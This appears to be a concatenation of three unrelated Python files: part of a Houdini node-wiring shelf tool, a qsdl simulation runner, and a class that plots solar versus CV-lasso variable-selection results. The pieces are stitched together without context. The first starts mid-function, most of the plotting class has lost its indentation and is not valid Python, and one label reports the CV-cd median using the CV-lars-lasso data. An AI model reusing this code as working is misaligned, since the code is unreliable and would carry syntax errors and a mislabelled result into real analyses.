        selected.setInput(slot, previous, 0)
def switchInput(current, last):
    """Choose which input index of 'current' should receive 'last'.

    If 'last' is already wired into 'current', that connection is removed and
    the next input index is chosen (wrapping back to 0), so repeated calls
    cycle the connection through the available inputs. Returns the chosen
    input index (0 when there was no prior connection).
    """
    #print("switchInput")
    found=-1
    for ele in current.inputConnections():
        if (ele.inputNode().name() == last.name()):
            found = ele.inputIndex()
            # Disconnect the existing link before re-wiring.
            current.setInput(found, None, 0)
            #print("already connected")
            # Advance to the next input slot if one exists, else wrap to 0.
            if len(current.inputConnectors())>=found+2:
                found += 1
            else:
                found = 0
            break
    if found<0:
        found = 0
    return found
# Shelf-tool entry point: 'kwargs' is injected by Houdini when the tool runs.
if kwargs['ctrlclick'] or kwargs['cmdclick']:
    # Ctrl/Cmd-click: RESET the callback state.
    initVariables()
    #print("reset")
else:
    try:
        if getRunning():
            # CALLBACK is running: wire up the current selection.
            if len(getCurrent()) > 1:
                connectByHeight(getCurrent()[0], getCurrent()[1])
            else:
                connectByLastSelection()
        else:
            #print("start")
            # START CALLBACK
            initVariables()
    except Exception:
        # Bug fix: was a bare 'except:' which also trapped SystemExit /
        # KeyboardInterrupt; on any real error, reset the tool state.
        initVariables()
|
import sys
from pyxb.exceptions_ import ValidationError
import qsdl.parser.config01 as configPYXB
from qsdl.parser.parsedConfig import ConfigDescriptor
import qsdl.simulator.simulationRunner as simulationRunner
import qsdl.parser.cliParser as cliParser
import matplotlib as matplotlib
# Use a non-interactive matplotlib backend to allow running in command line env.
matplotlib.use('AGG')
import figures as figures
from qsdl.simulator.errors.ConfigurationInvalidError import ConfigurationInvalidError
from qsdl.simulator.errors.CallbackError import CallbackError
def plot_cross_session_figures( sessions, costIncrement, gainIds ):
    """Render the three cross-session summary figures for *sessions*."""
    figures.plotAverageGainsAtRankAcrossSessions( sessions )
    figures.plotAverageGainsAtCostAcrossSessions( sessions, costIncrement )
    figures.plotDerivedGainsAcrossSessions( sessions, gainIds, costIncrement )
# Cost increment between sampling points on the cost-based plots.
DEFAULT_COST_INCREMENT = 10

configName = cliParser.get_config_file_name()
confDesc = None
try:
    # NOTE(review): 'file()' here (and 'iterkeys()' below) are Python 2 only;
    # this script requires Python 2 as written.
    confDesc = ConfigDescriptor( configPYXB.CreateFromDocument(
        file(configName).read()) )
except IOError as e:
    sys.stderr.write( 'ERROR: Configuration file or a file referenced in the config is inaccessible.\n' )
    sys.stderr.write(e.strerror + ' - ' + e.filename + '\n')
    sys.exit(1)
except ValidationError as e:
    sys.stderr.write( 'ERROR: Validation of configuration file (' + configName + ') failed.\n' )
    sys.stderr.write(e.details() + '\n')
    sys.exit(1)

try:
    # One simulation run per configured run id; each produces cross-session
    # output plus (optionally) per-session outputs and figures.
    for runId in confDesc.get_run_id_iterator():
        figures.set_run_id(runId)
        sessions = simulationRunner.run_sessions( confDesc, runId )
        confDesc.get_cross_session_output_writer( sessions, runId )()
        figures.set_output_directory( confDesc.get_cross_session_output_directory() )
        plot_cross_session_figures( sessions, DEFAULT_COST_INCREMENT, confDesc.get_default_derived_gains_dict().keys() )
        if not confDesc.only_cross_session_output():
            for simulationIterations in sessions:
                confDesc.get_output_writer( simulationIterations, confDesc.get_random_seed(), configName, runId )()
                sessid = str(simulationIterations[0].get_session_id())
                figures.set_output_directory( confDesc.get_output_directory( sessid ) )
                figures.plotGainsAtRank( simulationIterations )
                figures.plotGainsAtCost(simulationIterations, DEFAULT_COST_INCREMENT)
                figures.plotDerivedGains(simulationIterations, confDesc.get_derived_gains_dict( sessid ).iterkeys(), DEFAULT_COST_INCREMENT)
                figures.plotCostsAtRank(simulationIterations)
                figures.plotCustomFigures(simulationIterations, confDesc.get_custom_figures_dict(sessid))
except ValidationError as e:
    sys.stderr.write( 'ERROR: Invalid content found in simulation description.\n' )
    sys.stderr.write(e.details() + '\n')
    sys.exit(1)
except ConfigurationInvalidError as e:
    sys.stderr.write( 'ERROR: Invalid configuration detected. Please check configuration file.\n' )
    sys.stderr.write( 'ERROR: ' + str(e) + '\n')
    sys.exit(1)
except CallbackError as e:
    sys.stderr.write( 'ERROR: Invalid callback configuration detected.\n' )
    sys.stderr.write( 'ERROR: ' + str(e) + '\n')
    sys.exit(1)
|
import numpy as np
import matplotlib.pyplot as plt
from simulator_ic import simul
from solar_parallel import solar
from tqdm import tqdm
########################################################################
# define the class 'the simulation_plot' for irrepresentable condition #
########################################################################
'''
this class is used for plotting the result of IRC example
Check this before you run the code:
Please check that you have 'scikit-learn', 'numpy', 'matplotlib' and 'tqdm' installed. If not,
1. run 'pip install scikit-learn numpy matplotlib tqdm' if you use pure Python3
2. run 'conda install scikit-learn numpy matplotlib tqdm' if you use Anaconda3
Modules:
1. from scikit-learn, we call 'LassoLarsCV' and 'LassoCV' for cv-lars-lasso and cv-cd respectively;
2. we use 'numpy' for matrix computation and random variable generation;
3. for 'simulator_ic', 'solar' and 'costcom', plz see 'simulator_ic.py', 'solar.py' and 'costcom.py' for detail;
4. 'tqdm' is used to construct the progress bar;
5. we use 'matplotlib' to plot all figures;
Inputs:
1. X and Y : the inputs and output of regression
2. sample_size : the total sample size we generate for cv-lars-lasso, cv-cd and solar
3. n_dim : the number of total variables in X
4. n_info : number of non-zero regression coefficients in data-generating process
5. n_repeat : the number of subsamples in solar
6. num_rep : the number of repetitions
7. step_size : step size for tuning the value of c for solar;
8. rnd_seed : the random seed
9. plot_on : binary, whether the plot will be saved as pdf
Outputs:
1. solar_coef_stack: the stack of solar regression coefficients in 200 repeats
2. opt_c_stack : the stack of values of c* in 200 repeats
3. Q_opt_c_stack : the stack of Q(c*) in 200 repeats
4. la_array_stack : the stack of number of variables selected by CV-lars-lasso in 200 repeats
5. la_var_stack : the stack of the variables selected by CV-lars-lasso in 200 repeats
6. cd_array_stack : the stack of number of variables selected by CV-cd in 200 repeats
7. cd_var_stack : the stack of the variables selected by CV-cd in 200 repeats
Remarks:
1. In each round of subsampling, we randomly take out 1/K points out of the sample and make the rest as the subsample in this round
2. As competitors, we use X and Y for LassoLarsCV (called CV-lars-lasso in paper) and LassoCV (called CV-cd in paper) estimation, which relies on 10-fold CV.
'''
class simul_plot:
def __init__(self, sample_size, n_dim, n_info, coef_1, coef_2, n_repeat, num_rep, step_size, rnd_seed, plot_on):
    """Store the simulation parameters for the IRC plotting experiment."""
    ##for convenience, we define the common variables (those we need multiple times) as attributes (xxxx as self.xxxx)
    #define the paras
    self.sample_size = sample_size  #sample size
    self.n_dim = n_dim              #the number of total variables in X
    self.n_info = n_info            #number of non-zero regression coefficients in data-generating process
    self.n_repeat = n_repeat        #the number of subsamples generated in solar
    self.num_rep = num_rep          #the number of repetitions in Simulation 1, 2 and 3
    self.step_size = step_size      #step size for tuning the value of c for solar
    self.rnd_seed = rnd_seed        #the random seed for reproduction
    self.coef_1 = coef_1            #the value of omega in data-generating process
    self.coef_2 = coef_2            #the value of omega in data-generating process
    self.coef_t = coef_1 + coef_2   #if this value is at most 1 (omega is positive in our simulation), the irrepresentable condition is not violated
    self.plot_on = plot_on          #whether the plot will be saved as pdf
def simul_func(self):
    """Run self.num_rep repetitions of solar vs CV-lars-lasso / CV-cd and
    return the stacked per-repeat results (see the class docstring)."""
    #compute 200 repeats of solar vs cv-lars-lasso and cv-cd
    opt_c_stack = list()       #the stack of values of c* in 200 repeats
    Q_opt_c_stack = list()     #the stack of Q(c*) in 200 repeats
    la_array_stack = list()    #the stack of number of variables selected by CV-lars-lasso in 200 repeats
    la_var_stack = list()      #the stack of the variables selected by CV-lars-lasso in 200 repeats
    cd_array_stack = list()    #the stack of number of variables selected by CV-cd in 200 repeats
    cd_var_stack = list()      #the stack of the variables selected by CV-cd in 200 repeats
    solar_coef_stack = list()  #the stack of solar regression coefficients in 200 repeats
    abs_ic_stack = list()      #the stack of the empirical value of mu (defined along with the irrepresentable condition, Section 2.1) in each sample (across 200 repeats)
    #to make parallel computing replicable, set random seeds
    np.random.seed(self.rnd_seed)
    # Draw one integer seed per repetition (plain randint draws, not NumPy
    # SeedSequences) so every repeat is independently reproducible.
    seeds = np.random.randint(1e8, size=self.num_rep)
    ##use for-loop to compute 200 repeats
    #use 'tqdm' in for loop to construct the progress bar
    for i in tqdm(range(self.num_rep)):
        np.random.seed(seeds[i])
        #if irrepresentable condition is violated in population, break
        if self.coef_t > 1:
            print("Warning: this simulation and plotting classes is composed only for the cases where irrepresentable condition is satistied. When irrepresentable condition is violated, the ranking of variables in plots and their probaility will be in error and misordered.")
            break
        #1. call the class 'simul' from 'simul.py'
        trial1 = simul(self.sample_size, self.n_dim, self.n_info, self.coef_1, self.coef_2)
        #2. generate X and Y in each repeat
        X, Y, abs_ic = trial1.data_gen()
        #3. call the class 'solar' from 'solar.py'
        trial2 = solar( X, Y, self.n_repeat, self.step_size, lasso = True)
        #4. compute solar, cv-lars-lasso and cv-cd on X and Y
        solar_coef, opt_c, test_error, Qc_list, Q_opt_c, la_list, la_vari_list, cd_list, cd_vari_list = trial2.fit()
        #5. find Q(c*) for solar (take the largest c among the minimizers of the test error)
        min_loc_val = np.where(test_error == min(test_error))[0]
        Q_opt_c = Qc_list[max(min_loc_val)]
        #6. save the value of c* (opt_c) into 'opt_c_stack' (the stack of 'the value of c* of solar' in 200 repeats)
        opt_c_stack.append(max(opt_c))
        #7. save Q(c*) (Q_opt_c) into 'Q_opt_c_stack' (the stack of 'variables selected by solar' in 200 repeats)
        Q_opt_c_stack.append(Q_opt_c)
        #8. save the number of variables selected by cv-lars-lasso (la_list) into 'la_array_stack'
        la_array_stack.append(la_list)
        #9. save the variables selected by cv-lars-lasso (la_vari_list) into 'la_var_stack'
        la_var_stack.append(la_vari_list)
        #10. save the number of variables selected by cv-cd (cd_list) into 'cd_array_stack'
        cd_array_stack.append(cd_list)
        #11. save the variables selected by cv-cd (cd_vari_list) into 'cd_var_stack'
        cd_var_stack.append(cd_vari_list)
        #12. save solar regression coefficients (solar_coef) into 'solar_coef_stack'
        solar_coef_stack.append(solar_coef)
        #13. save the empirical mu for this sample
        abs_ic_stack.append(abs_ic)
    return opt_c_stack, Q_opt_c_stack, la_array_stack, la_var_stack, solar_coef_stack, abs_ic_stack, cd_array_stack, cd_var_stack
def vari_hist(self, Q_opt_c_stack, la_array_stack, cd_array_stack):
#the histogram of number of variables selected : solar vs competitors
if self.coef_t <= 1:
#use 'solar_len_array' to record the number of variables selected by solar in each repeat
solar_len_array = np.empty([len(Q_opt_c_stack)])
#count the number of variables selected by solar in each repeat by computing the length (number of elements) of Q(c) in each repeat
for i in range(len(Q_opt_c_stack)):
solar_len_array[i] = len(Q_opt_c_stack[i])
##overlaid histogram plot of num_var_selected: solar vs CV-cd
f11 = plt.figure()
#histogram plot of solar and CV-cd
plt.hist(solar_len_array, 20, density = True, alpha=0.8, color = "dodgerblue", label='Number of variables selected by solar')
plt.hist(cd_array_stack, 20, density = True, alpha=0.65, color = "lawngreen", label='Number of variables selected by CV-cd ')
#plot vertical lines for the mean of solar and cv-cd (and report them as legend)
plt.axvline(x=np.mean(solar_len_array), linewidth=2.5, color='b',label='solar mean')
plt.gcf().text(1, 1, 'mean for solar : ' + str(np.mean(solar_len_array)))
plt.axvline(x=np.mean(cd_array_stack), linewidth=2.5, color='g',label='CV-cd mean')
plt.gcf().text(1, 0.9, 'mean for CV-cd : ' + str(np.mean(cd_array_stack)))
#plot vertical lines for the median of solar and cv-cd (and report them as legend)
plt.axvline(x=np.median(solar_len_array), linewidth=2.5, color='b', ls =':', label='solar median')
plt.gcf().text(1, 0.85, 'median for solar : ' + str(np.median(solar_len_array)))
plt.axvline(x=np.median(cd_array_stack), linewidth=2.5, color='g', ls =':', label=' CV-cd median')
plt.gcf().text(1, 0.75, 'median for CV-cd : ' + str(np.median(la_array_stack)))
#legend of histogram plot
plt.legend(loc=9, bbox_to_anchor=(0.5, -0.2), borderaxespad=0., ncol=3, shadow=True)
plt.xlabel('number of variables selected', fontsize=16)
plt.xlim(3,30)
plt.ylim(0,0.6)
plt.ylabel('Density', fontsize=16)
plt.title('solar vs CV-cd : sparsity', fontsize=16)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.grid(True)
plt.show()
#output it into pdf
if self.plot_on == True:
f11.savefig("./figure/sparsity_plot_ic_"+str(self.coef_1)+"_vs_CVcd.pdf", bbox_inches='tight')
##overlaid hist plot of num_var_selected: solar vs CV-lars-lasso
f1 = plt.figure()
#histogram plot of solar and CV-lars-lasso
plt.hist(solar_len_array, 20, density = True, alpha=0.8, color = "dodgerblue", label='Number of variables selected by solar')
plt.hist(la_array_stack, 20, density = True, alpha=0.65, color = "orange", label='Number of variables selected by CV-lars-lasso')
#plot vertical lines for the mean of solar and CV-lars-lasso (and report them as legend)
plt.axvline(x=np.mean(solar_len_array), linewidth=2.5, color='b',label='solar mean')
plt.gcf().text(1, 1, 'mean for solar : ' + str(np.mean(solar_len_array)))
plt.axvline(x=np.mean(la_array_stack), linewidth=2.5, color='r',label='CV-lars-lasso mean')
plt.gcf().text(1, 0.95, 'mean for CV-lars-lasso : ' + str(np.mean(la_array_stack)))
#plot vertical lines for the median of solar and CV-lars-lasso (and report them as legend)
plt.axvline(x=np.median(solar_len_array), linewidth=2.5, color='b', ls =':', label='solar median')
plt.gcf().text(1, 0.85, 'median for solar : ' + str(np.median(solar_len_array)))
plt.axvline(x=np.median(la_array_stack), linewidth=2.5, color='r', ls =':', label=' CV-lars-lasso median')
plt.gcf().text(1, 0.8, 'median for CV-lars-lasso : ' + str(np.median(la_array_stack)))
#legend
plt.legend(loc=9, bbox_to_anchor=(0.5, -0.2), borderaxespad=0., ncol=3, shadow=True)
plt.xlabel('number of variables selected', fontsize=16)
plt.xlim(3,30)
plt.ylim(0,0.6)
plt.ylabel('Density', fontsize=16)
plt.title('solar vs CV-lars-lasso : sparsity', fontsize=16)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.grid(True)
plt.show()
#output it into pdf
if self.plot_on == True:
f1.savefig("./figure/sparsity_plot_ic_"+str(self.coef_1)+"_vs_CVlars.pdf", bbox_inches='tight')
#count how many repeats solar select 5 variables
print("in " + str(np.count_nonzero(solar_len_array- 5)) + " out of " + str(self.num_rep) + " solar pick more/less than 5 variables")
#count how many repeats CV-lars-lasso select 5 variables
print("in " + str(np.count_nonzero(np.array(la_array_stack) - 5)) + " out of " + str(self.num_rep) + " CV-lars-lasso pick more/less than 5 variables")
#count how many repeats CV-cd select 5 variables
print("in " + str(np.count_nonzero(np.array(cd_array_stack) - 5)) + " out of " + str(self.num_rep) + " CV-cd pick more/less than 5 variables")
#if the irrepresentable condition is violated
else:
print("Warning: this simulation and plotting classes is composed only for the cases where irrepresentable condition is satistied. When irrepresentable condition is violated, the ranking of variables in plots and their probaility will be in error and misordered.")
def q_hist(self, opt_c_stack):
#histogram plot of c* of solar in 200 repeatss
if self.coef_t <= 1:
f2 = plt.figure()
plt.hist(opt_c_stack, facecolor='r', alpha=0.75)
plt.xlabel('c*', fontsize=16)
plt.ylabel('Frequency', fontsize=16)
plt.title('histogram of c* selected by solar among 200 repeats', fontsize=16)
plt.grid(True)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.tight_layout()
plt.show()
if self.plot_on == True:
f2.savefig("./figure/q-values_plot_ic_"+str(self.coef_1)+".pdf", bbox_inches='tight')
#if the irrepresentable condition is violated
else:
print("Warning: this simulation and plotting classes is composed only for the cases where irrepresentable condition is satistied. When irrepresentable condition is violated, the ranking of variables in plots and their probaility will be in error and misordered.")
def acc_plot(self, Q_opt_c_stack, la_var_stack, cd_var_stack, num_var_to_plot, print_true):
#bar plot: probability of solar/cv-lars-lasso/cv-cd selecting each variable (all 5 informative variables; redundant variables (of top 35 probability))
if self.coef_t <= 1:
#prepare the bar plot of solar
#1. first we concatenate 'Q_opt_c_stack' (the stack of indices of variables selected by solar among 200 repeats) into one whole array ('solar_vari_appe_stack')
solar_vari_appe_stack = np.concatenate(Q_opt_c_stack,0)
#2. set 'solar_plot_stack' as the placeholder of the probailities of selecting each variable by solar (ranking in decreasing order)
solar_plot_stack = list()
#3. set 'solar_x_axi' as the label of variable names (from x_0 to x_p, where p is the number of variables in X)
solar_x_axi = np.arange(0, self.n_dim)
#prepare the bar plot of CV-lars-lasso
#1. first we concatenate 'la_var_stack' (the stack of indices of variables selected by cv-lars-lasso among 200 repeats) into one whole array ('l_vari_appe_stack')
l_vari_appe_stack = np.concatenate(la_var_stack,0)
#2. set 'l_plot_stack' as the container of the probailities of selecting each variable by cv-lars-lasso (ranking in decreasing order)
l_plot_stack = list()
#3. set 'l_x_axi' as the array of variable names (from x_0 to x_p, where p is the number of variables in X)
l_x_axi = np.arange(0,self.n_dim)
#prepare the bar plot of CV-cd
#1. first we concatenate 'cd_var_stack' (the stack of indices of variables selected by cv-cd) into one whole array ('cd_vari_appe_stack')
cd_vari_appe_stack = np.concatenate(cd_var_stack,0)
#2. set 'cd_plot_stack' as the container of the probailities of selecting each variable by cv-cd (ranking in decreasing order)
cd_plot_stack = list()
#3. set 'cd_x_axi' as the array of variable names (from x_0 to x_p, where p is the number of variables in X)
cd_x_axi = np.arange(0,self.n_dim)
#compute the probailities of solar/cv-lars-lasso/cv-cd selecting each variable.
for i in range(self.n_dim):
#1. Given the variable i in X, compute the probability of selecting it by solar via (1) counting how many i in 'solar_vari_appe_stack' (the stack of indices of variables selected by solar among 200 repeats) (2) divide that count by number of repeats (200 in paper) (3) save it as the i-th element of solar_plot_stack
solar_plot_stack.append((solar_vari_appe_stack == i).sum()/self.num_rep)
#2. Given the variable i in X, compute the probability of selecting it by cv-lars-lasso via (1) counting how many i in 'l_vari_appe_stack' (the stack of indices of variables selected by cv-lars-lasso among 200 repeats) (2) divide that count by number of repeats (200 in paper) (3) save it as the i-th element of l_plot_stack
l_plot_stack.append((l_vari_appe_stack == i).sum()/self.num_rep)
#3. Given the variable i in X, compute the probability of selecting it by cv-cd via (1) counting how many i in 'cd_vari_appe_stack' (the stack of indices of variables selected by cv-cd among 200 repeats) (2) divide that count by number of repeats (200 in paper) (3) save it as the i-th element of cd_plot_stack
cd_plot_stack.append((cd_vari_appe_stack == i).sum()/self.num_rep)
##Ranking (decreasingly) the probability of solar selecting each variable
####Since we only plot the redundant variable with top 35 probabilities, in this part we use the method called 'simultaneous sorting': sort two array (the array of 'probability of selecting each variable' and the array of 'labels for the horizontal axis in the figure') simultaneously based on the order of the first array
#1a. rank elements of 'solar_plot_stack' in increasing order; reverse it into decreasing order and save it as 'solar_plot_stack_ranked'
#1b. ranking 'solar_x_axi' based on the increasing order of 'solar_plot_stack' and save it as 'solar_x_axi_ranked'
solar_x_axi_ranked = [x for _,x in sorted(zip(solar_plot_stack,solar_x_axi))]
solar_plot_stack_ranked = np.sort(solar_plot_stack)[::-1]
#2. generate 'solar_label' as the label (for horizontal axis in figure) of each variable in the increasing order.
solar_labels = [ 'X' + str(x) for x in solar_x_axi_ranked]
#3. the index of variable plotted at each bar
solar_final_x_axi_ranked = solar_x_axi_ranked[::-1]
#4. reverse the order of 'solar_label' to decreasing order
solar_final_label = solar_labels[::-1]
##Ranking (decreasingly) the probability of cv-lars-lasso selecting each variable
##Since we only plot the redundant variable with top 35 probabilities, in this part we use the method called 'simultaneous sorting': sort two array (the array of 'probability of selecting each variable' and the array of 'labels for the horizontal axis in the figure') simultaneously based on the order of the first array
#1a. rank elements of 'l_plot_stack' in increasing order; reverse it into decreasing order and save it as 'l_plot_stack_ranked'
#1b. ranking 'l_x_axi' based on the increasing order of 'l_plot_stack' and save it as 'l_x_axi_ranked'
l_x_axi_ranked = [x for _,x in sorted(zip(l_plot_stack,l_x_axi))]
l_plot_stack_ranked = np.sort(l_plot_stack)[::-1]
#2. generate 'l_label' as the label (for horizontal axis in figure) of each variable in the increasing order.
l_labels = [ 'X' + str(x) for x in l_x_axi_ranked]
#3. the index of variable plotted at each bar
l_final_x_axi_ranked = l_x_axi_ranked[::-1]
#4. reverse the order of 'l_label' to decreasing order
l_final_label = l_labels[::-1]
##Ranking (decreasingly) the probability of cv-cd selecting each variable
##Since we only plot the redundant variable with top 35 probabilities, in this part we use the method called 'simultaneous sorting': sort two array (the array of 'probability of selecting each variable' and the array of 'labels for the horizontal axis in the figure') simultaneously based on the order of the first array
#1a. rank elements of 'cd_plot_stack' in increasing order; reverse it into decreasing order and save it as 'cd_plot_stack_ranked'
#1b. ranking 'cd_x_axi' based on the increasing order of 'cd_plot_stack' and save it as 'cd_x_axi_ranked'
cd_x_axi_ranked = [x for _,x in sorted(zip(cd_plot_stack,cd_x_axi))]
cd_plot_stack_ranked = np.sort(cd_plot_stack)[::-1]
#2. generate 'cd_label' as the label (for horizontal axis in figure) of each variable in the increasing order.
cd_labels = [ 'X' + str(x) for x in cd_x_axi_ranked]
#3. the index of variable plotted at each bar
cd_final_x_axi_ranked = cd_x_axi_ranked[::-1]
#4. reverse the order of 'cd_label' to decreasing order
cd_final_label = cd_labels[::-1]
#bar plot for solar
f4 = plt.figure()
# The big plot
ax = f4.add_subplot(111)
# Turn off axis lines and ticks of the big subplot
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_color('none')
ax.spines['left'].set_color('none')
ax.spines['right'].set_color('none')
ax.tick_params(labelcolor='w', top='off', bottom='off', left='off', right='off')
ax.yaxis.set_major_locator(plt.NullLocator())
#the bar plot of the probability of solar selecting each variable
ax1 = f4.add_subplot(212)
for i in range(min(num_var_to_plot, self.n_dim)):
#turn the bar plot of informative variables into red
if solar_final_x_axi_ranked[i] < 5:
ax1.bar(x = solar_x_axi[i], height= solar_plot_stack_ranked[i], width=0.3, color = ['red'])
#turn the bar plot of x_5 into orangered
elif solar_final_label[i] == 'X5':
ax1.bar(x = solar_x_axi[i], height= solar_plot_stack_ranked[i], width=0.3, color = ['orangered'])
#turn the bar plot of redundant variables into blue
else:
ax1.bar(x = solar_x_axi[i], height= solar_plot_stack_ranked[i], width=0.3, color = ['blue'])
# add the variable name as the labels for the horizontal axis of the bar plot
plt.xticks(solar_x_axi[0 : num_var_to_plot], solar_final_label[:num_var_to_plot], rotation='vertical')
plt.tick_params(axis='both', which='major', labelsize=16)
#if we want to see the probability for redundant variables, change the plot range of the horizontal axis
if print_true == False :
ax1.set_xlim(4.5, num_var_to_plot + 1)
ax1.set_ylim(0, 0.55)
ax1.set_ylabel('Probability', fontsize=16)
plt.title('solar', fontsize=16)
#if we want to see the probability for informative variables, change the plot range of the horizontal axis
else:
ax1.set_xlim(-0.5, 4.5)
ax1.set_ylim(0, 1.05)
ax1.set_ylabel('Probability', fontsize=16)
plt.title('solar', fontsize=16)
plt.tight_layout()
plt.show()
#output it as pdf file
if self.plot_on == True:
f4.savefig("./figure/acc_plot_top" + str(num_var_to_plot) + "_ic_" + str(self.coef_1) + "_" + str(print_true) + "_solar.pdf", bbox_inches='tight')
##bar plot of cv-lars-lasso
f44 = plt.figure()
# The big plot
ax00 = f44.add_subplot(111)
# Turn off axis lines and ticks of the big subplot
ax00.spines['top'].set_color('none')
ax00.spines['bottom'].set_color('none')
ax00.spines['left'].set_color('none')
ax00.spines['right'].set_color('none')
ax00.tick_params(labelcolor='w', top='off', bottom='off', left='off', right='off')
ax00.yaxis.set_major_locator(plt.NullLocator())
#the bar plot of the probability of cv-lars-lasso selecting each variable
ax2 = f44.add_subplot(212)
for i in range(min(num_var_to_plot, self.n_dim)):
#turn the bar plot of informative variables into red
if l_final_x_axi_ranked[i] < 5:
ax2.bar(x = l_x_axi[i], height= l_plot_stack_ranked[i], width=0.3, color = ['red'])
#turn the bar plot of x_5 into orangered
elif l_final_label[i] == 'X5':
ax2.bar(x = l_x_axi[i], height= l_plot_stack_ranked[i], width=0.3, color = ['orangered'])
#turn the bar plot of redundant variables into blue
else:
ax2.bar(x = l_x_axi[i], height= l_plot_stack_ranked[i], width=0.3, color = ['blue'])
# add the variable name as the labels for the horizontal axis of the bar plot
plt.xticks(l_x_axi[0 : num_var_to_plot], l_final_label[:num_var_to_plot], rotation='vertical')
plt.tick_params(axis='both', which='major', labelsize=16)
#if we want to see the probability for redundant variables, change the plot range of the horizontal axis
if print_true == False :
ax2.set_xlim(4.5, num_var_to_plot + 1)
ax2.set_ylim(0, 0.55)
ax2.set_ylabel('Probability', fontsize=16)
plt.title('CV-lars-lasso ', fontsize=16)
#if we want to see the probability for informative variables, change the plot range of the horizontal axis
else:
ax2.set_xlim(-0.5, 4.5)
ax2.set_ylim(0, 1.05)
ax2.set_ylabel('Probability', fontsize=16)
plt.title('CV-lars-lasso ', fontsize=16)
plt.tight_layout()
plt.show()
#output it as pdf file
if self.plot_on == True:
f44.savefig("./figure/acc_plot_top" + str(num_var_to_plot) + "_ic_" + str(self.coef_1) + "_" + str(print_true) + "_lars.pdf", bbox_inches='tight')
#bar plot for cv-cd
f444 = plt.figure()
# The big plot
ax000 = f444.add_subplot(111)
# Turn off axis lines and ticks of the big subplot
ax000.spines['top'].set_color('none')
ax000.spines['bottom'].set_color('none')
ax000.spines['left'].set_color('none')
ax000.spines['right'].set_color('none')
ax000.tick_params(labelcolor='w', top='off', bottom='off', left='off', right='off')
ax000.yaxis.set_major_locator(plt.NullLocator())
#bar plot of the probability of cv-cd selecting each variable
ax3 = f444.add_subplot(212)
for i in range(min(num_var_to_plot, self.n_dim)):
#turn the bar plot of informative variables into red
if cd_final_x_axi_ranked[i] < 5:
ax3.bar(x = cd_x_axi[i], height= cd_plot_stack_ranked[i], width=0.3, color = ['red'])
#turn the bar plot of x_5 into orangered
elif cd_final_label[i] == 'X5':
ax3.bar(x = cd_x_axi[i], height= cd_plot_stack_ranked[i], width=0.3, color = ['orangered'])
#turn the bar plot of redundant variables into blue
else:
ax3.bar(x = cd_x_axi[i], height= cd_plot_stack_ranked[i], width=0.3, color = ['blue'])
# add the variable name as the labels for the horizontal axis of the bar plot
plt.xticks(cd_x_axi[0 : num_var_to_plot], cd_final_label[:num_var_to_plot], rotation='vertical')
plt.tick_params(axis='both', which='major', labelsize=16)
#if we want to see the probability for redundant variables, change the plot range of the horizontal axis
if print_true == False :
ax3.set_xlim(4.5, num_var_to_plot + 1)
ax3.set_ylim(0, 0.55)
ax3.set_ylabel('Probability', fontsize=16)
plt.title('CV-cd', fontsize=16)
#if we want to see the probability for informative variables, change the plot range of the horizontal axis
else:
ax3.set_xlim(-0.5, 4.5)
ax3.set_ylim(0, 1.05)
ax3.set_ylabel('Probability', fontsize=16)
plt.title('CV-cd', fontsize=16)
plt.tight_layout()
plt.show()
#output it as pdf file
if self.plot_on == True:
f444.savefig("./figure/acc_plot_top" + str(num_var_to_plot) + "_ic_" + str(self.coef_1) + "_" + str(print_true) + "_cd.pdf", bbox_inches='tight')
else:
print("Warning: this simulation and plotting classes is composed only for the cases where irrepresentable condition is satistied. When irrepresentable condition is violated, the ranking of variables in plots and their probaility will be in error and misordered.")
def bl_vari_plot(self, solar_coef_stack, num_var_to_plot):
#boxplot of each solar regression coefficient
#since we only boxplot olar regression coefficients (of top 15 means), we do the ranking again
if self.coef_t <= 1:
#boxplot of each regression coefficient for solar
bl_coef_stack = np.concatenate(solar_coef_stack,1)
solar_x_axi = np.arange(0, self.n_dim)
solar_plot_stack = np.mean(bl_coef_stack, axis=1)
solar_final_x_axi_ranked = [x for _,x in sorted(zip(solar_plot_stack,solar_x_axi))][::-1]
#solar_plot_stack_ranked = np.sort(solar_plot_stack)[::-1]
solar_final_label = [ 'beta' + str(x) for x in solar_final_x_axi_ranked]
f3 = plt.figure()
plt.boxplot(list(bl_coef_stack[solar_final_x_axi_ranked[:num_var_to_plot],:]),
positions=solar_x_axi[:num_var_to_plot])
plt.xticks(solar_x_axi[0 : num_var_to_plot], solar_final_label[:num_var_to_plot], rotation='vertical')
loc_5 = solar_final_x_axi_ranked.index(5)
if loc_5 <= num_var_to_plot:
plt.axvspan(loc_5 - 0.5, loc_5 + 0.5, color='red', alpha=0.25)
plt.title('The boxplot of solar regression coefficient', fontsize=16)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.tight_layout()
plt.show()
#count in how many repeats solar estimate the regression coefficient of x_0 as 0
print('the number of non-zeros in the boxplot of beta_0: ', self.num_rep - len(np.where(bl_coef_stack[0,:] == 0)[0]))
#count in how many repeats solar estimate the regression coefficient of x_1 as 1
print('the number of non-zeros in the boxplot of beta_1: ', self.num_rep - len(np.where(bl_coef_stack[1,:] == 0)[0]))
#count in how many repeats solar estimate the regression coefficient of x_2 as 2
print('the number of non-zeros in the boxplot of beta_2: ', self.num_rep - len(np.where(bl_coef_stack[2,:] == 0)[0]))
#count in how many repeats solar estimate the regression coefficient of x_3 as 3
print('the number of non-zeros in the boxplot of beta_3: ', self.num_rep - len(np.where(bl_coef_stack[3,:] == 0)[0]))
#count in how many repeats solar estimate the regression coefficient of x_4 as 4
print('the number of non-zeros in the boxplot of beta_4: ', self.num_rep - len(np.where(bl_coef_stack[4,:] == 0)[0]))
#output it as pdf file
if self.plot_on == True:
f3.savefig("./figure/solar_vari_plot_top"+str(num_var_to_plot)+"_ic_"+str(self.coef_1)+".pdf", bbox_inches='tight')
else:
print("Warning: this simulation and plotting classes is composed only for the cases where irrepresentable condition is satistied. When irrepresentable condition is violated, the ranking of variables in plots and their probaility will be in error and misordered.")
##################################
# test if this module works fine #
##################################
'''
this part is set up to test the functionability of the class above;
you can run all the codes in this file to test if the class works;
when you call the class from this file, the codes (even functions or classes) after " if __name__ == '__main__': " will be ingored
'''
if __name__ == '__main__':
    # small configuration so the smoke test runs quickly
    sample_size = 200
    n_dim = 100
    n_info = 5
    coef_1 = 1 / 3
    coef_2 = 1 / 3
    n_repeat = 3
    num_rep = 3
    step_size = -0.02
    rnd_seed = 1
    plot_on = False
